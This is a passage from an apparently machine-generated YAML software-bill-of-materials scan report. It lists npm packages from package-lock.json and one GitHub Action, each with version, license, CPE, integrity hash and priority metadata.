kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4a3de97ef48e263d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/jsonwebtoken 9.0.10'
|
|
title: '@types/jsonwebtoken 9.0.10'
|
|
description: 'Package discovered: @types/jsonwebtoken 9.0.10'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bbe9092f97742247
|
|
name: '@types/jsonwebtoken'
|
|
version: 9.0.10
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/jsonwebtoken:\@types\/jsonwebtoken:9.0.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/jsonwebtoken@9.0.10
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/jsonwebtoken/-/jsonwebtoken-9.0.10.tgz
|
|
integrity: sha512-asx5hIG9Qmf/1oStypjanR7iKTv0gXQ1Ov/jfrX6kS/EO0OFni8orbmGCn0672NHR3kXHwpAwR+B368ZGN/2rA==
|
|
dependencies:
|
|
'@types/ms': '*'
|
|
'@types/node': '*'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: be245f9788db1459
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/long 4.0.2'
|
|
title: '@types/long 4.0.2'
|
|
description: 'Package discovered: @types/long 4.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 69a126982af5137d
|
|
name: '@types/long'
|
|
version: 4.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/long:\@types\/long:4.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/long@4.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz
|
|
integrity: sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b5bebd78899827a5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/ms 2.1.0'
|
|
title: '@types/ms 2.1.0'
|
|
description: 'Package discovered: @types/ms 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fa54533e742eac71
|
|
name: '@types/ms'
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/ms:\@types\/ms:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/ms@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/ms/-/ms-2.1.0.tgz
|
|
integrity: sha512-GsCCIZDE/p3i96vtEqx+7dBUGXrc7zeSK3wwPHIaRThS+9OhWIXRqzs4d6k1SVU8g91DrNRWxWUGhp5KXQb2VA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 191b23786146803d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/node 20.19.39'
|
|
title: '@types/node 20.19.39'
|
|
description: 'Package discovered: @types/node 20.19.39'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c19052194c7f9053
|
|
name: '@types/node'
|
|
version: 20.19.39
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/node:\@types\/node:20.19.39:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/node@20.19.39
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/node/-/node-20.19.39.tgz
|
|
integrity: sha512-orrrD74MBUyK8jOAD/r0+lfa1I2MO6I+vAkmAWzMYbCcgrN4lCrmK52gRFQq/JRxfYPfonkr4b0jcY7Olqdqbw==
|
|
dependencies:
|
|
undici-types: ~6.21.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9b5805676545e7d1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/node 22.19.17'
|
|
title: '@types/node 22.19.17'
|
|
description: 'Package discovered: @types/node 22.19.17'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b0b14dd646c615be
|
|
name: '@types/node'
|
|
version: 22.19.17
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/node:\@types\/node:22.19.17:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/node@22.19.17
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz
|
|
integrity: sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q==
|
|
dependencies:
|
|
undici-types: ~6.21.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 08409c71d4ce88d9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/request 2.48.13'
|
|
title: '@types/request 2.48.13'
|
|
description: 'Package discovered: @types/request 2.48.13'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 656ffeda0aaf4e8b
|
|
name: '@types/request'
|
|
version: 2.48.13
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/request:\@types\/request:2.48.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/request@2.48.13
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/request/-/request-2.48.13.tgz
|
|
integrity: sha512-FGJ6udDNUCjd19pp0Q3iTiDkwhYup7J8hpMW9c4k53NrccQFFWKRho6hvtPPEhnXWKvukfwAlB6DbDz4yhH5Gg==
|
|
dependencies:
|
|
'@types/caseless': '*'
|
|
'@types/node': '*'
|
|
'@types/tough-cookie': '*'
|
|
form-data: ^2.5.5
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: dd961f2e03e7418d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/tough-cookie 4.0.5'
|
|
title: '@types/tough-cookie 4.0.5'
|
|
description: 'Package discovered: @types/tough-cookie 4.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: cf24fb05ea581070
|
|
name: '@types/tough-cookie'
|
|
version: 4.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/tough-cookie:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/tough-cookie:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/tough_cookie:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/tough_cookie:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/tough:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@types\/tough:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/tough-cookie@4.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz
|
|
integrity: sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7a188cdbd82f20f1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @types/ws 8.18.1'
|
|
title: '@types/ws 8.18.1'
|
|
description: 'Package discovered: @types/ws 8.18.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 919683ef9260890b
|
|
name: '@types/ws'
|
|
version: 8.18.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@types\/ws:\@types\/ws:8.18.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40types/ws@8.18.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz
|
|
integrity: sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==
|
|
dependencies:
|
|
'@types/node': '*'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 89056081bb223fd4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: abbrev 2.0.0'
|
|
title: abbrev 2.0.0
|
|
description: 'Package discovered: abbrev 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0277554910df9b38
|
|
name: abbrev
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:abbrev:abbrev:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/abbrev@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/abbrev/-/abbrev-2.0.0.tgz
|
|
integrity: sha512-6/mh1E2u2YgEsCHdY0Yx5oW+61gZU+1vXaoiHHrpKeuRNNgFvS+/jrwHiQhB5apAf5oB7UB7E19ol2R2LKH8hQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 873a6392b6c08a39
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: abort-controller 3.0.0'
|
|
title: abort-controller 3.0.0
|
|
description: 'Package discovered: abort-controller 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 02974b3dbbe4d3d6
|
|
name: abort-controller
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:abort-controller:abort-controller:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abort-controller:abort_controller:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abort_controller:abort-controller:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abort_controller:abort_controller:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abort:abort-controller:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abort:abort_controller:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/abort-controller@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz
|
|
integrity: sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg==
|
|
dependencies:
|
|
event-target-shim: ^5.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 661684530a17a73f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: abs-svg-path 0.1.1'
|
|
title: abs-svg-path 0.1.1
|
|
description: 'Package discovered: abs-svg-path 0.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2eb8f1fab63663a1
|
|
name: abs-svg-path
|
|
version: 0.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:abs-svg-path:abs-svg-path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs-svg-path:abs_svg_path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs_svg_path:abs-svg-path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs_svg_path:abs_svg_path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs-svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs-svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs_svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs_svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs:abs-svg-path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:abs:abs_svg_path:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/abs-svg-path@0.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/abs-svg-path/-/abs-svg-path-0.1.1.tgz
|
|
integrity: sha512-d8XPSGjfyzlXC3Xx891DJRyZfqk5JU0BJrDQcsWomFIV1/BIzPW5HDH5iDdWpqWaav0YVIEzT1RHTwWr0FFshA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 27802507a1dbe242
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: accepts 1.3.8'
|
|
title: accepts 1.3.8
|
|
description: 'Package discovered: accepts 1.3.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e96668e505272792
|
|
name: accepts
|
|
version: 1.3.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:accepts:accepts:1.3.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/accepts@1.3.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz
|
|
integrity: sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==
|
|
dependencies:
|
|
mime-types: ~2.1.34
|
|
negotiator: 0.6.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 352cd9201a8ce90d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
startLine: 0
|
|
message: 'Package discovered: actions/checkout v2'
|
|
title: actions/checkout v2
|
|
description: 'Package discovered: actions/checkout v2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b54bfb1da26ce9cd
|
|
name: actions/checkout
|
|
version: v2
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/actions/checkout@v2
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: actions/checkout@v2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
